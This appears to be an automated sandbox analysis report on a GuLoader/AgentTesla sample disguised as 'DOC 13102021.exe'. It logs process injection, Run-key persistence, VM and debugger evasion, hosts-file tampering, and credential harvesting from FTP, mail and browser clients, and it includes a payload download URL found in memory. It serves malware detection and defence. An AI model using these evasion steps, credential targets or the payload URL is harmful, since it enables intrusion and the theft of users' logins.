            Source: C:\Users\user\Desktop\DOC 13102021.exeCode function: 0_2_004070AC pushad ; retf 0_2_004070AD
            Source: C:\Users\user\Desktop\DOC 13102021.exeCode function: 0_2_02204A2A push 00000000h; ret 0_2_02204A2C
            Source: C:\Users\user\Desktop\DOC 13102021.exeCode function: 0_2_02202C33 push ss; retf 0_2_02202C34
            Source: C:\Users\user\Desktop\DOC 13102021.exeCode function: 0_2_02203862 push ecx; ret 0_2_02203883
            Source: C:\Users\user\Desktop\DOC 13102021.exeCode function: 0_2_02201C8D push esi; ret 0_2_02201CAA
            Source: C:\Users\user\Desktop\DOC 13102021.exeCode function: 0_2_022050EE push edx; retf 0_2_022050F4
            Source: C:\Users\user\Desktop\DOC 13102021.exeCode function: 0_2_02203F12 push es; ret 0_2_02203F14
            Source: C:\Users\user\Desktop\DOC 13102021.exeCode function: 0_2_0220431D pushad ; iretd 0_2_02204394
            Source: C:\Users\user\Desktop\DOC 13102021.exeCode function: 0_2_0220436B pushad ; iretd 0_2_02204394
            Source: C:\Users\user\Desktop\DOC 13102021.exeCode function: 0_2_02204798 push ebp; retf 0_2_022047A2
            Source: C:\Users\user\Desktop\DOC 13102021.exeCode function: 0_2_02202BE7 push esi; iretd 0_2_02202C09
            Source: C:\Users\user\Desktop\DOC 13102021.exeCode function: 0_2_022047F5 push ebx; ret 0_2_02204808
            Source: C:\Users\user\AppData\Roaming\tKZVPq\tKZVPq.exeCode function: 41_2_00F744A3 push es; retf 41_2_00F744A4
            Source: C:\Users\user\AppData\Roaming\tKZVPq\tKZVPq.exeCode function: 41_2_00F74469 push cs; retf 41_2_00F7449E
            Source: C:\Users\user\AppData\Roaming\tKZVPq\tKZVPq.exeCode function: 41_2_00F74289 push es; retf 41_2_00F74294
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Roaming\tKZVPq\tKZVPq.exeJump to dropped file
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run tKZVPqJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run tKZVPqJump to behavior

            Hooking and other Techniques for Hiding and Protection:

            barindex
            Hides that the sample has been downloaded from the Internet (zone.identifier)Show sources
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\tKZVPq\tKZVPq.exe:Zone.Identifier read attributes | deleteJump to behavior
            Source: C:\Users\user\Desktop\DOC 13102021.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\DOC 13102021.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\DOC 13102021.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\DOC 13102021.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\DOC 13102021.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\DOC 13102021.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\DOC 13102021.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\DOC 13102021.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\DOC 13102021.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\DOC 13102021.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\tKZVPq\tKZVPq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\tKZVPq\tKZVPq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\tKZVPq\tKZVPq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\tKZVPq\tKZVPq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\tKZVPq\tKZVPq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\tKZVPq\tKZVPq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\tKZVPq\tKZVPq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\tKZVPq\tKZVPq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\tKZVPq\tKZVPq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\tKZVPq\tKZVPq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\tKZVPq\tKZVPq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion:

            barindex
            Tries to detect Any.runShow sources
            Source: C:\Users\user\Desktop\DOC 13102021.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exeJump to behavior
            Source: C:\Users\user\Desktop\DOC 13102021.exeFile opened: C:\Program Files\qga\qga.exeJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exeJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Program Files\qga\qga.exeJump to behavior
            Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
            Source: DOC 13102021.exe, 00000000.00000002.1441897691.00000000022F0000.00000004.00000001.sdmpBinary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32USERPROFILE=WINDIR=\MICROSOFT.NET\FRAMEWORK\V4.0.30319\REGASM.EXE\SYSWOW64\MSVBVM60.DLL
            Source: RegAsm.exe, 00000019.00000002.5636629483.0000000000D00000.00000004.00000001.sdmpBinary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32USERPROFILE=HTTPS://DRIVE.GOOGLE.COM/UC?EXPORT=DOWNLOAD&ID=1C8OENB3NC7DJNCVQZVUETP49SAKVJ9VX
            Source: DOC 13102021.exe, 00000000.00000002.1441897691.00000000022F0000.00000004.00000001.sdmp, RegAsm.exe, 00000019.00000002.5636629483.0000000000D00000.00000004.00000001.sdmpBinary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
            Source: DOC 13102021.exe, 00000000.00000002.1441036088.000000000059D000.00000004.00000020.sdmpBinary or memory string: \??\C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
            Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)Show sources
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
            Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)Show sources
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2468Thread sleep time: -2767011611056431s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Roaming\tKZVPq\tKZVPq.exe TID: 2540Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\AppData\Roaming\tKZVPq\tKZVPq.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWindow / User API: threadDelayed 9956Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\AppData\Roaming\tKZVPq\tKZVPq.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\DOC 13102021.exeSystem information queried: ModuleInformationJump to behavior
            Source: DOC 13102021.exe, 00000000.00000002.1443617890.00000000048A9000.00000004.00000001.sdmp, RegAsm.exe, 00000019.00000002.5648099419.0000000002809000.00000004.00000001.sdmpBinary or memory string: Hyper-V Guest Shutdown Service
            Source: DOC 13102021.exe, 00000000.00000002.1443617890.00000000048A9000.00000004.00000001.sdmp, RegAsm.exe, 00000019.00000002.5648099419.0000000002809000.00000004.00000001.sdmpBinary or memory string: Hyper-V Remote Desktop Virtualization Service
            Source: RegAsm.exe, 00000019.00000002.5648099419.0000000002809000.00000004.00000001.sdmpBinary or memory string: vmicshutdown
            Source: DOC 13102021.exe, 00000000.00000002.1443617890.00000000048A9000.00000004.00000001.sdmp, RegAsm.exe, 00000019.00000002.5648099419.0000000002809000.00000004.00000001.sdmpBinary or memory string: Hyper-V Volume Shadow Copy Requestor
            Source: DOC 13102021.exe, 00000000.00000002.1441897691.00000000022F0000.00000004.00000001.sdmpBinary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32USERPROFILE=windir=\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe\syswow64\msvbvm60.dll
            Source: DOC 13102021.exe, 00000000.00000002.1443617890.00000000048A9000.00000004.00000001.sdmp, RegAsm.exe, 00000019.00000002.5648099419.0000000002809000.00000004.00000001.sdmpBinary or memory string: Hyper-V PowerShell Direct Service
            Source: DOC 13102021.exe, 00000000.00000002.1443617890.00000000048A9000.00000004.00000001.sdmp, RegAsm.exe, 00000019.00000002.5648099419.0000000002809000.00000004.00000001.sdmpBinary or memory string: Hyper-V Time Synchronization Service
            Source: RegAsm.exe, 00000019.00000002.5648099419.0000000002809000.00000004.00000001.sdmpBinary or memory string: vmicvss
            Source: RegAsm.exe, 00000019.00000002.5642799670.0000000000FA7000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW
            Source: DOC 13102021.exe, 00000000.00000002.1441897691.00000000022F0000.00000004.00000001.sdmp, RegAsm.exe, 00000019.00000002.5636629483.0000000000D00000.00000004.00000001.sdmpBinary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
            Source: DOC 13102021.exe, 00000000.00000002.1443617890.00000000048A9000.00000004.00000001.sdmp, RegAsm.exe, 00000019.00000002.5648099419.0000000002809000.00000004.00000001.sdmpBinary or memory string: Hyper-V Data Exchange Service
            Source: RegAsm.exe, 00000019.00000002.5636629483.0000000000D00000.00000004.00000001.sdmpBinary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32USERPROFILE=https://drive.google.com/uc?export=download&id=1C8oenb3NC7djnCvQzvUetP49sAKvj9vX
            Source: DOC 13102021.exe, 00000000.00000002.1443617890.00000000048A9000.00000004.00000001.sdmp, RegAsm.exe, 00000019.00000002.5648099419.0000000002809000.00000004.00000001.sdmpBinary or memory string: Hyper-V Heartbeat Service
            Source: RegAsm.exe, 00000019.00000002.5640301133.0000000000F28000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW
            Source: DOC 13102021.exe, 00000000.00000002.1441036088.000000000059D000.00000004.00000020.sdmpBinary or memory string: \??\C:\Program Files\Qemu-ga\qemu-ga.exe
            Source: DOC 13102021.exe, 00000000.00000002.1443617890.00000000048A9000.00000004.00000001.sdmp, RegAsm.exe, 00000019.00000002.5648099419.0000000002809000.00000004.00000001.sdmpBinary or memory string: Hyper-V Guest Service Interface
            Source: RegAsm.exe, 00000019.00000002.5648099419.0000000002809000.00000004.00000001.sdmpBinary or memory string: vmicheartbeat

            Anti Debugging:

            barindex
            Hides threads from debuggersShow sources
            Source: C:\Users\user\Desktop\DOC 13102021.exeThread information set: HideFromDebuggerJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread information set: HideFromDebuggerJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\Desktop\DOC 13102021.exeCode function: 0_2_004022D6 mov ebx, dword ptr fs:[00000030h]0_2_004022D6
            Source: C:\Users\user\Desktop\DOC 13102021.exeCode function: 0_2_0040323D mov ebx, dword ptr fs:[00000030h]0_2_0040323D
            Source: C:\Users\user\Desktop\DOC 13102021.exeCode function: 0_2_004031DE mov ebx, dword ptr fs:[00000030h]0_2_004031DE
            Source: C:\Users\user\Desktop\DOC 13102021.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 25_2_00A4714C LdrInitializeThunk,25_2_00A4714C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: page read and write | page guardJump to behavior

            HIPS / PFW / Operating System Protection Evasion:

            barindex
            Writes to foreign memory regionsShow sources
            Source: C:\Users\user\Desktop\DOC 13102021.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: B00000Jump to behavior
            Modifies the hosts fileShow sources
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile written: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Users\user\Desktop\DOC 13102021.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe 'C:\Users\user\Desktop\DOC 13102021.exe' Jump to behavior
            Source: RegAsm.exe, 00000019.00000002.5646644853.00000000013B1000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
            Source: RegAsm.exe, 00000019.00000002.5646644853.00000000013B1000.00000002.00020000.sdmpBinary or memory string: Progman
            Source: RegAsm.exe, 00000019.00000002.5646644853.00000000013B1000.00000002.00020000.sdmpBinary or memory string: Progmanlock
            Source: RegAsm.exe, 00000019.00000002.5646644853.00000000013B1000.00000002.00020000.sdmpBinary or memory string: wProgram Manager
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\tKZVPq\tKZVPq.exeQueries volume information: C:\Users\user\AppData\Roaming\tKZVPq\tKZVPq.exe VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Lowering of HIPS / PFW / Operating System Security Settings:

            barindex
            Modifies the hosts fileShow sources
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile written: C:\Windows\System32\drivers\etc\hostsJump to behavior

            Stealing of Sensitive Information:

            barindex
            Yara detected AgentTeslaShow sources
            Source: Yara matchFile source: 00000019.00000002.5658064562.000000001DB31000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 2588, type: MEMORYSTR
            GuLoader behavior detectedShow sources
            Source: Initial fileSignature Results: GuLoader behavior
            Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)Show sources
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
            Tries to harvest and steal ftp login credentialsShow sources
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xmlJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\Jump to behavior
            Tries to steal Mail credentials (via file access)Show sources
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
            Tries to harvest and steal browser information (history, passwords, etc)Show sources
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
